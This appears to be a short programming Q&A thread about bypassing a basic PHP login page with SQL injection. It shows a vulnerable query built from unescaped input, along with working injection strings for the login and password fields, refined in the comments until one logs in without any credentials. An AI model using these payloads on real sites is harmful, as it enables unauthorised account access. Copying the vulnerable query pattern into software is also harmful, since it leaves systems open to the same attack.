# Bypassing website authentication

Tags: php, passwords, sql-injection

I have a part of a very basic login page code written in php that I want to bypass whithout already having any login.

```
 $req="select id from USERS where login='$login' and pwd='$pass'";
 $result = mysql_query($req);
```

If I have a user's login for example login1 that is already in the database. I just have to enter the following entries to login whithout knowing his password; what we call SQL Injection:

```
 login="login1"
 password="' OR '1'='1'"
```

However, I don't know how can we do to log in the page without any login or password.

Thank you in advance !

Comment: `login = "' OR true ORDER BY RAND() LIMIT 1 --"` --- weeeeeeeeeeee

Comment: and for the password ? whatever for it ?

Comment: Anything, it's commented

Comment: @zerkms It doesn't work !! I got an SQL syntax error near the "--"

Comment: `/*` then http://dev.mysql.com/doc/refman/5.6/en/comments.html

Answer (score 0):

It works with `login="' OR true ORDER BY RAND() LIMIT 1 /*"`